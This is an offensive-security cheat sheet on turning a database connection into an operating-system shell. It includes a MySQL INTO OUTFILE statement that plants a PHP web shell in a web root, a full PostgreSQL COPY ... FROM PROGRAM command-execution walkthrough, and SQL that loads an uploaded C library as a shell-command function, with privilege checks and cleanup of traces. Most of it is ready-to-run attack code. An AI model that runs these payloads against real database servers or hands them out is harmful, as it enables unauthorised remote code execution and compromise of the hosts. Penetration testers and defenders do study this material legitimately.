Leet Sheet
Get a Shell From DB Connection

You have a connection to a database. How can you get a shell from that?

Write a Web Shell

Prerequisites:

  • A web server that runs PHP or ASP is installed on the same host as the database server

  • The database server process can write to a directory from which the web server serves and executes PHP or ASP (for MySQL this additionally needs the FILE privilege on your account and a secure_file_priv setting that permits the target directory; with secure_file_priv set to NULL, INTO OUTFILE is disabled entirely)

Many databases can write files to the local filesystem of the database host. So if those conditions hold, write a web shell into the web root.

MySQL example (the 1, 2 and 4 are padding columns as you would need in a UNION-based injection to match the original query's column count; on a direct connection they can be dropped. The padding values end up in the file too, but PHP ignores anything outside the <?php ... ?> tags. The file is written by the mysqld process, so its OS user needs write access, and the file must not already exist):

select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

Databases Support Command Execution

Some database systems can execute operating system commands natively, so you can use that directly. Always check whether the database system supports running commands, and whether there are known CVEs or techniques for running shell commands against that specific DB and version.

Prerequisite:

  • Connection to a database system that supports command execution

  • Certain privileges for the user you're connecting as may be required

PostgreSQL Intended Command Execution

Prerequisites:

  • Heightened privileges:

    • Database superuser

    • Or (PostgreSQL 11 and later) membership in the pg_execute_server_program role

First, the attacker needs to create a table to hold the system command's output.

> CREATE TABLE cmd_exec(cmd_output text);

Then they can run the system command with COPY ... FROM PROGRAM (the TO PROGRAM form instead pipes table contents into the program's standard input). PostgreSQL executes the string via the shell on the database host, as the OS user the server runs as (usually postgres), and reads the program's standard output into the table, one row per line.

> COPY cmd_exec FROM PROGRAM 'id';

Commands with arguments are passed the same way. A command that prints nothing inserts zero rows, which is still a successful execution:

> COPY cmd_exec FROM PROGRAM 'touch /tmp/test';
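The whole COPY ... FROM PROGRAM procedure end to end, added here as an example rather than taken from the original page: privilege check, output table, a command using shell syntax, and cleanup. The table name cmd_exec follows the page; the commands run are arbitrary choices.

```sql
-- Added example (not from the original page): full COPY ... FROM PROGRAM
-- round trip, starting with the privilege check that decides if it can work.

-- 1. Are we superuser, or (PostgreSQL 11+) a member of pg_execute_server_program?
--    On servers older than 11 the role does not exist and the third query
--    errors, which itself tells you that only a superuser can do this there.
SELECT version();
SELECT rolsuper FROM pg_roles WHERE rolname = current_user;
SELECT pg_has_role(current_user, 'pg_execute_server_program', 'MEMBER');

-- 2. Somewhere to collect stdout: one text column, one row per output line.
CREATE TABLE cmd_exec (cmd_output text);

-- 3. Run a command. It executes on the database host, as the OS user running
--    the postgres backend, so the identity printed is that account's, not ours.
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

-- 4. Arguments, pipes and other shell syntax are fine: the string is handed to
--    the shell (sh -c on Unix). Dollar quoting avoids doubling every single
--    quote inside the command.
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM $$ls -la /tmp | grep -v '^total'$$;
SELECT * FROM cmd_exec;

-- 5. A command that prints nothing inserts zero rows; that is success, not failure.
COPY cmd_exec FROM PROGRAM 'touch /tmp/test';

-- 6. Output lines containing a tab would be parsed as extra columns and make
--    the COPY fail; for such commands pipe the output through base64 first.
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /etc/hostname | base64 -w0';
SELECT convert_from(decode(cmd_output, 'base64'), 'UTF8') FROM cmd_exec;

-- 7. Clean up when done.
DROP TABLE cmd_exec;
```

Because the command runs as the server's OS account on the database host, anything you touch on disk is owned by that account; keep that in mind when the goal is a web shell rather than an interactive shell.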

PostgreSQL Command Execution Using Extensions

Prerequisites:

  • In every version, CREATE FUNCTION ... LANGUAGE C is restricted to superusers, so the account you connect as must be a database superuser

  • The shared library must be written to a directory on the database host that the server process can read (commonly /tmp), and it must be compiled against the same PostgreSQL major version as the target, because the server checks the library's PG_MODULE_MAGIC block when loading it

Method:

  • With postgres 8.x, use the metasploit module.

  • With 9.x, you'll have to compile the library yourself, against the target's major version.

Reference: RCE with PostgreSQL Extensions (HackTricks)
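What loading the compiled library looks like on the SQL side, added as an example and not code from the page or from the linked HackTricks write-up. It assumes a superuser session, that the library is already on the database host at /tmp/pg_exec.so (an assumed path), that it was built against the server's major version, and that it exports a C function named sys (an assumed name) which passes its argument to the shell and returns the exit status. Building and transferring the library is the part the page defers to the linked resources.

```sql
-- Added example (not from the original page): binding an already-uploaded
-- shared library as a C-language function and calling it.
-- Assumptions: library at /tmp/pg_exec.so (assumed path) exporting a symbol
-- named sys (assumed name) that runs its cstring argument through the shell
-- and returns the exit status as an int.

-- 1. Which major version to build against, and are we allowed to do this?
--    CREATE FUNCTION ... LANGUAGE C is superuser-only in every PostgreSQL version.
SELECT version();
SELECT rolsuper FROM pg_roles WHERE rolname = current_user;

-- 2. Bind the exported symbol to a SQL function. The server dlopen()s the
--    file at this point; a build against the wrong major version fails here
--    with an "incompatible library" error rather than at call time.
CREATE OR REPLACE FUNCTION sys(cstring) RETURNS int
  AS '/tmp/pg_exec.so', 'sys'
  LANGUAGE C STRICT;

-- 3. Run a command. As with COPY FROM PROGRAM it executes on the database
--    host as the OS user running the server; the return value is the exit
--    status, so 0 means the shell ran it successfully.
SELECT sys('touch /tmp/test');

-- 4. Remove the function when done. The library file on disk has to be
--    deleted separately, e.g. via the function itself before dropping it.
SELECT sys('rm -f /tmp/pg_exec.so');
DROP FUNCTION sys(cstring);
```

Dropping the library while the function still references it is fine for this cleanup order: the server already has the code mapped, and the DROP only removes the catalog entry.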